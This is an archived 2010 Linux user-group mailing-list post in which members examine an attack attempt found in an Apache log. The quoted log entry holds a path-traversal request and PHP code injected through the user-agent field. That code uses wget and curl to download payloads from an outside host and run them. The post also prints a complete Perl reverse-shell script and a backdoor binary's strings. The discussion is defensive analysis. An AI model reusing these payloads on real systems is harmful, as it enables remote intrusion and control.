[ Date Index ] [ Thread Index ] [ <= Previous by date / thread ] [ Next by date / thread => ]
On Tue, 22 Jun 2010 20:37:15 +0100 (BST)
Gordon Henderson wrote:
>
> And who says Linux isn't targetted by scammers, etc...
>
>
> I noticed this in a log-file earlier - I see this sort of thing
> regularly, but thought I'd post one here for you:
>
> 94.199.181.165 - - [22/Jun/2010:19:13:20 +0100] "GET
> /index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../proc/self/environ%00
>
> HTTP/1.1" 404 270 "-" "<?system('cd /var/tmp;wget
> http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget
> http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80;cd
> /dev/shm;curl -O http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30
> 80;curl -O http://195.239.120.69/cback;chmod +x cback;./cback
> 192.24.5.30 80');?> ;<?exec_shell('cd /var/tmp;wget
> http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget
> http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30
> 80;cd /dev/shm;curl -O http://195.239.120.69/cb.txt;perl cb.txt
> 192.24.5.30 80;curl -O http://195.239.120.69/cback;chmod +x
> cback;./cback 192.24.5.30 80');?> ;<?passthru('cd /var/tmp;wget
> http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget
> http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30
> 80;cd /dev/shm;curl -O http://195.239.120.69/cb.txt;perl cb.txt
> 192.24.5.30 80;curl -O http://195.239.120.69/cback;chmod +x
> cback;./cback 192.24.5.30 80');?>;Ustupid MF is Back; Mozilla/4.0
> (compatible; MSIE 6.0; Windows 98)"
>
> That's an entry from an apache server log-file. Good, eh? I'm not
> sure what sort of index.php might respond to that request, however
> it's trying to run a program to wget a file, then perl the file.
>
> The perl file it gets, bascially runs this:
>
> #!/usr/bin/perl
> use Socket;
> $cmd= "lynx";
> $system= 'echo "`uname -a`";echo "`id`";HISTFILE=/dev/null /bin/sh
> -i'; $0=$cmd;
> $target=$ARGV[0];
> $port=$ARGV[1];
> $iaddr=inet_aton($target) || die("Error: $!\n");
> $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
> $proto=getprotobyname('tcp');
> socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
> connect(SOCKET, $paddr) || die("Error: $!\n");
> open(STDIN, ">&SOCKET");
> open(STDOUT, ">&SOCKET");
> open(STDERR, ">&SOCKET");
> system($system);
> close(STDIN);
> close(STDOUT);
> close(STDERR);
>
> which appears to send some basic information to a remote site.
>
> then it fetches 'cback'. This is a binary file - and guess what it's
> compiled for:
>
> file cback
> cback: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),
> for GNU/Linux 2.0.0, dynamically linked (uses shared libs), stripped
>
> Not going to execute it, but dumping strings from it reveals this:
>
> %s <host> <port>
> socket ok
> /bin/sh
> error: %s
> retring in 5 seconds
> fork error, retyr in 5 seconds
> cannot create socket, retring in 5 seconds
> GCC: (GNU) 3.3.3
>
>
>
> My guess is that it's sitting there, waiting for commands from a
> remote site - to do what? Who knows.
>
> So there you go - Linux *is* being targetted and obvously the target
> above is for some specific site running some specific version of some
> software, but who knows!
I just downloaded the Reverse Engineering Compiler (REC) and decompiled
the cback file to some C code. I have no idea what it says as I really
haven't a clue when it comes to C/C++.
I won't post the contents as this is a public and archived list.
Anyone wants the RECed C code to have a look through, let me know and I
can email you off-list.
Grant.
--
The Mailing List for the Devon & Cornwall LUG
http://mailman.dclug.org.uk/listinfo/list
FAQ: http://www.dcglug.org.uk/linux_adm/list-faq.html